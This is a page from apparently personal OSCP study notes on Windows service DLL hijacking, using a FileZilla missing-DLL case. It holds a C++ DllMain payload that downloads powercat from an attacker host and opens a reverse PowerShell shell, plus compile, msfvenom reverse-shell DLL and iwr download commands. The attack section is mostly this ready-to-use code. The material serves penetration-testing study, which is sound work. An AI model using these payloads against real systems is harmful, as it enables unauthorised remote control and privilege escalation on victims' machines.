🐲
OSCP Notes
  • 🐲OSCP Notes
  • 🐲OSCP Methodology
  • 💡Misc
    • Metasploit
    • Antivirus Evasion
    • Password attacks
    • Reverse Shells
    • Port Forwarding, Tunneling and Pivoting
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
      • Lingolo-ng
    • Information Gathering
      • Passive Reconnaissance
        • Whois
        • Google Dorks
        • NetCraft
        • Git Repository
      • Active Reconnaissance
        • DNS Enumeration
        • Host Discovery
        • Port scanning
        • SMTP - 25
        • SNMP
  • Linux
    • Local Enumeration
    • Local Privileges Escalation
      • Scheduled tasks
      • Password Authentication
      • Monitor Processes
      • SetUID Binaries and Capabilities
      • Sudoers
      • Kernel Exploits
  • Windows
    • 🧠Mindmap
    • 🥝Mimikatz Basics
    • Enumeration
      • External Enumeration
      • Local Enumeration
      • Active Directory
        • PowerView
    • NTLM Hashes
    • Local Privilege Escalation
      • Service Binary Hijacking
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Token impersonation
      • Backup Operators Group
    • Lateral Movement
      • WMI and WinRM
      • PsExec
      • Pass The Hash
      • Overpass The Hash
      • Pass The Ticket
      • DCOM
    • Persistence
      • Golden Ticket
      • Shadow Copy
    • Authentication Attacks
      • AS-REP Roasting
      • Kerberoasting
      • Password Spray
      • Silver Ticket
      • DC Sync
    • Client Side
    • NTLM Authentication
    • Kerberos Authentication
    • Cached Credentials
  • Web attacks
    • WordPress
    • SQL Injection (SQLi)
    • Command Injection
    • Directory Traversal
    • Local File Inclusion (LFI)
    • File Upload
Powered by GitBook
On this page
  • Exploiting a Missing DLL
  • Attack Path
  • Creating The DLL
  • Exploiting
  • References
  1. Windows
  2. Local Privilege Escalation

Service DLL Hijacking

PreviousService Binary HijackingNextUnquoted Service Paths

Last updated 7 months ago

This attack is similar to "" but instead of replacing the executable, it targets a the application relies on.

Another approach is hijacking the DLL search order, where Windows looks for the required DLLs in this sequence:

1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory. 
5. The current directory.
6. Directories in the PATH environment variable.

Exploiting a Missing DLL

List applications on the machine:

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Do some research about an application which is vulnerable to DLL Hijacking.

The following example displays a Service which is vulnerable kind of this attack.

In the example above, the application attempts to load a DLL, but fails to find it in its directory. Instead, TextShaping.dll loads from the System directory (2th in the search order).

The following screenshot is from Procmon, showing the application's attempt to load TextShaping.dll from the The directory from which the application loaded.

Attack Path

To exploit this, create a malicious DLL in the FileZilla directory so that when the application looks for the legitimate DLL, it loads the attacker’s version instead, executing malicious code.

Creating The DLL

Using C++ it is possible to create DLLMain function which is responsible to execute code in the DLL life cycle:

TextShaping.dll
#include <windows.h>
#include <string.h>

BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	system("powershell -c \"IEX (New-Object System.Net.Webclient).DownloadString('http://<attacker_ip>/powercat.ps1'); powercat -c <attacker_ip> -p <attacker_port> -e powershell\"");
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

Compile it:

x86_64-w64-mingw32-gcc TextShaping.cpp --shared -o TextShaping.dll

Alternatively, use msfvenom to generate the DLL:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o TextShaping.dll

Exploiting

Moving the DLL to the target directory:

iwr -uri http://<attacker_ip>/TextShaping.dll -OutFile 'C:\FileZilla\FileZilla FTP Client\TextShaping.dll'

Soon as the DLL will be attached the DLLMain function will execute.

References

Service Binary Hijacking
DLL
FileZilla Client 3.63.1 - 'TextShaping.dl' DLL HijackingExploit Database
FileZilla DLL Hijacking Exploit
Logo
Dynamic-link library search order - Win32 appsdocsmsft
Dynamic-link library search order
Logo
Process Monitor - Sysinternalsdocsmsft
Process Monitor
Logo
Procmon DLL attach failed